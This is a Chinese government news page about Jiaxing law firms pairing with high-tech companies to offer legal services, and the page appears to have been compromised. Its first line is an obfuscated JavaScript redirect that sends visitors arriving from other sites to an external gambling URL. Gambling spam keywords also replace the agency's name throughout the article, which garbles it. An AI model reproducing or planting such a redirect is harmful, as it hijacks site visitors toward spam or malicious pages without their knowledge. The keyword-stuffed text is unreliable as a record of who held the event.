var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > 律师管理·公证管理
发布日期:2019-10-25 浏览次数: 字号:[ ]

为深入开展助企、惠企法律服务工作,提供法治化、健康化的良好营商环境,10月23日下午,嘉兴知名律所与高科技企业结对共建活动在bbin宝盈,bbin下载:高层次人才高科技企业法律服务工作站顺利举办。bbin宝盈,bbin下载:、副局长,市律师行业党委书记陈建新出席活动并作讲话。“红船服务”总联盟、嘉兴科技城招商局、南湖区司法局等单位相关负责同志、结对共建的律所和高科技企业代表等近30人参加活动。  

结对共建活动上,bbin宝盈,bbin下载:本级6家知名律师事务所分别与嘉兴科技城内6家成长型的重点高科技企业签署了法治建设结对共建协议,律所代表、高科技企业代表做了工作交流和表态发言。  

陈建新副局长提出三点意见:一是提高政治站位,深刻认识开展律所与高科技企业结对共建活动的重要意义,只有营造良好的法治化营商环境,企业和企业家们才会踏踏实实发展实业,经济才有机会实现可持续、繁荣发展;二是突出服务重点,切实确保律所与高科技企业结对共建活动取得实效,坚持需求导向、问题导向、源头导向,破解高科技企业发展中的法律难题,为高科技企业高质量发展提供有效法治保障;三是总结经验成效,积极探索法治服务高端人才企业新模式,不断研发新的服务产品,丰富服务形式内容,总结新的服务方法,积极向社会宣传结对共建服务高科技企业共建双赢的显著成效和先进典型,不断扩大律师行业法律服务企业的美誉度、亲和力和社会影响。 

 




打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统